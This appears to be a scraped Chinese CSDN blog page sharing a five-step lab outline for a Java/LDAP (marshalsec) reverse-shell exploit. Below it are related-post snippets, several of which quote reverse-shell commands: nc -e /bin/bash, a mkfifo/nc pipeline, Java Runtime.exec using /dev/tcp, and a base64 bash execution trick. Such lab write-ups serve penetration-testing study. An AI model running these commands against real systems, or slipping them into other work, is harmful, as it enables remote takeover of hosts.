靶场分享反弹shell

于 2024-05-03 13:13:43 发布
阅读量159 收藏
点赞数 2
文章标签: 靶场
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81475812/article/details/138414310
版权

  • 1、存在反弹shell命令的java代码文件Exploit.java,通过版本为1.8的jdk工具进行编译,生成Exploit.class文件

  • 2、在存在Exploit.class文件的目录下开启http服务,让开启ldap服务端的工具marshalsec-0.0.3-SNAPSHOT-all.jar来访问这个文件

  • 3、使用工具marshalsec-0.0.3-SNAPSHOT-all.jar开启ldap服务端,并访问Exploit.class文件

  • 4、使用POC来连接ldap服务器端的访问过来的Exploit.class文件,通过参数传递到目标服务器进行解析

  • 5、存在对应漏洞的目标服务解析了Exploit.class里面编译后的代码,反弹shell成功

Pass!on
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux利用java反弹shell_linux反弹shell
weixin_42509888的博客
02-26 413
参考链接http://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.htmlhttp://www.waitalone.cn/linux-shell-rebound-under-way.htmlhttp://roo7break.co.uk/?p=215http://pentestmonkey.net/cheat-sheet/shells/re...
linux利用java反弹shell_Java Runtime.exe() 执行命令与反弹shell(上)
weixin_34710938的博客
02-26 565
0x00 前言在自己学习复现 Nexus Repository Manager 3 RCE 漏洞的时候(CVE-2020-10199/10204)由于自己对 Java 的 Runtime.exec() 执行命令以及反弹shell理解的太过于浅薄,使用了以下语句无法反弹shell,踩了很多坑$\\A{''.getClass().forName('java.lang.Runtime').getMeth...
【web安全】反弹shell 靶场测试+实战
最新发布
weixin_46301214的博客
11-22 506
NAT不一定可以,而且多了一行话,相同用户名的情况下还以为失败了。这里只讲实战或真机演练,具体原理网上一搜一大把,自己去看。知识点2:靶机测试 - 双kali - 脚本反弹。知识点2:靶机测试 - 双kali - 脚本反弹。知识点1:靶机测试 - 双kali。踩坑点:局域网内才稳定。:需要局域网内才稳定。
反弹shell&数据不回显带外查询&pikaqiu靶场搭建
fencecat的博客
03-04 1250
解决无图形化:当我们想下载一个文件时,通常是通过浏览器的一个链接直接访问网站点击下载的,但是在实际的安全测试中,我们获取的权限只是一个执行命令的窗口,无法获取图形化界面,因此,我们就需要命令来实现文件的上传和下载。比如,当我们想上传一个文件到对方的服务器,我们应该想办法用命令让对方执行下载操作,而不可能直接打开对方的服务器的浏览器去下载,因为我们没有获取这样的权限,只能通过黑窗窗输入命令尝试。Windows->| & || &&Linux->; | || & && ``(特有``和;)
反弹Shell原理与实现
m0_62451321的博客
11-14 3198
Windows作为攻击者主机,Linux是被入侵主机(目标主机),此时目标主机上只要能正常运行Linux命令便可以实现反弹,利用Linux的Bash命令重定向和Windows上的Netcat应用程序,如果没有,则网络下载netcat应用程序即可。远程桌面,Web服务,SSH,SMB等等,都是正向连接。(3)对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知,所以建立一个服务端,让恶意程序主动连接,才是上策。(1)某客户机中了你的木马,但是它在局域网内,你直接连接不了。
java反弹shell
a807719447的专栏
01-26 2023
import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.net.Socket; public class Exploit { public Exploit() throws Exception { String host="xx.xx.xx.xx"; int port=9001; String cmd="/bi.
反弹Shell方法论,Windows篇
大河之犬的博客
10-10 837
使用它你可以轻易的建立任何连接。要创建Powershell反向Shell,黑客需要在目标系统上运行一个恶意的Powershell脚本,该脚本将与攻击者的服务器建立连接。Powershell反向Shell是一种常用的攻击技术,用于在目标系统上建立与攻击者控制的远程服务器之间的连接。Perl反向Shell是一种利用Perl编写的恶意脚本,用于建立与目标系统的反向连接。在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。
反弹shell
Massimo__JAVA的博客
04-27 352
环境:攻击者kali:192.168.116.128受害者centos:192.168.116.95kali监听本地7777端口目标机执行反弹shell命令命令解释为:将目标主机的bash shell以-i交互式的方式,标准输出+错误输出重定向到192.168.116.128:7777,而在192.168.116.128:7777的标准输入命令会重定向到192.168.116.128:7777的标准输出中简言而知,就是将目标主机的标准输入、标准输出、错误输出全都重定向到攻击端上。
java调用shell获取错误信息_记一次突破反弹shell
weixin_39994461的博客
11-20 295
这是酒仙桥六号部队的第 106篇文章。全文共计1809个字,预计阅读时长6分钟。背景某天闲着无聊,小伙伴发来一个某网站,说只能执行命令,不能反弹shell。测试对着目标站点一顿测试。发现确实存在shiro反序列化,并且存在可以利用的gadget。利用发现确实可以执行命令,但是我们执行反弹的时候。反弹不回来,emmm。查看各种系命令以及分析。发现是一个精简的Linux,经常用于doc...
linux利用java反弹shell_Linux重定向及反弹shell详解
weixin_36288711的博客
02-26 193
这里说Linux重定向的原因主要还是为了详细了解一下Linux中的反弹shell目录0x01 文件描述符0x02 重定向0x03 反弹shell0x04 交互重定向0x05 命令变形0x01 文件描述符Linux的文件描述符有以下三种标准输入:0标准输出:1错误输出:2对于文件描述符就先知道这些就可以了,具体的使用会在重定向中来说,重定向就是对文件描述符的操作0x02 重定向重定向主要分为以下两种...
使用java命令执行函数反弹windows-shell
qq_51478862的博客
04-16 3800
前言 偶尔有时命令执行有效负载Runtime.getRuntime().exec()会失败。使用Webshell,反序列化漏洞或其他向量时可能会发生这种情况。 这是因为重定向和管道字符的使用方式在正在启动的进程的上下文中没有意义。 所以不像在命令框中可以直接运行复杂命令 对于Linux靶机可以使用base64编码命令进行绕过。 bash -c {echo,命令进行base64编码}|{base64,-d}|{bash,-i} 而对于windows系统一直没有解决方法。 而这篇文章就是解决该问题的。 因为语雀
反弹shell总结
桀骜不逊
02-09 1095
nc反弹shell 正向shell nc -lvp 1234 -e /bin/bash # linux 服务端(被攻击的主机) nc -lvp 1234 -e c:\windows\system32\cmd.exe # windows 服务端(被攻击的主机) nc host.example.com 1234 # linux 客户端 rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -l host.example.
反弹shell从入门到进阶
飞鱼的企鹅的博客
10-14 332
前言 在渗透测试过程中,反弹shell是获取到权限的一种很重要的方式,一直用那些反弹shell的命令却不知道是什么意思,现在来专门学习一下原理。 什么是反弹shell 反弹shell(reverse shell),就是监控端在监控某TCP/UDP端口,被控制端使用漏洞或其他方法发起请求到该端口,并将其命令行的输入输出转到控制端。 为什么要反弹shell 当我们已经打开了被攻击机的相应端口,如22,...
vulhub漏洞复现66_Spring
weixin_44193247的博客
02-13 1063
vulhub漏洞复现练习篇
反弹shell的命令大全
G3et的博客
03-21 887
【代码】反弹shell的命令大全。
Apache Log4j2 RCE漏洞利用反弹shell合集
热门推荐
good good study
03-10 1万+
Apache Log4j2 是一款开源的 Java 日志记录工具,大量的业务框架都使用了该组件。如:Apache Struts2、Apache Solr、Apache Druid、Apache Flink等。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。
java 反弹连接_渗透-N种反弹shell方法
weixin_30753213的博客
02-27 796
简介reverse shell反弹shell或者说反向shell,就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。通常用于被控端因防火墙受限、权限不足、端口被占用等情形。什么是反弹,为什么要反弹假设我们攻击了一台机器,打开了该机器的一个端...
java Runtime.getRuntime().exec 获取反弹shell
whatday的专栏
07-03 6235
说明 前面写了一篇在Java环境下获取shell的文章。当时使用的语句是: 1 2 3 Runtime r = Runtime.getRuntime(); Process p = r.exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/ip/port;cat <&5 | while read line; do $line 2>&5 >&5; done"}); p
反弹shell汇总
chang113的博客
06-12 764
反弹shell整理
java中runtime.exec无法反弹bash shell的原因及解决办法
10-02 2863
前些天在搞es的远程代码执行问题,扫描器扫出来几个,想反弹shell出来,结果反弹不出来。 图看不清楚…总之就是使用 java.lang.Runtime.getRuntime().exec(command),执行了反弹shell的bash命令。结果反弹不出来。 问了同事才知道,管道符、输入输出重定向,只有在bash环境下才能用。而在这里,我们使用的是java为我们提供的命令执行环境,不支...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值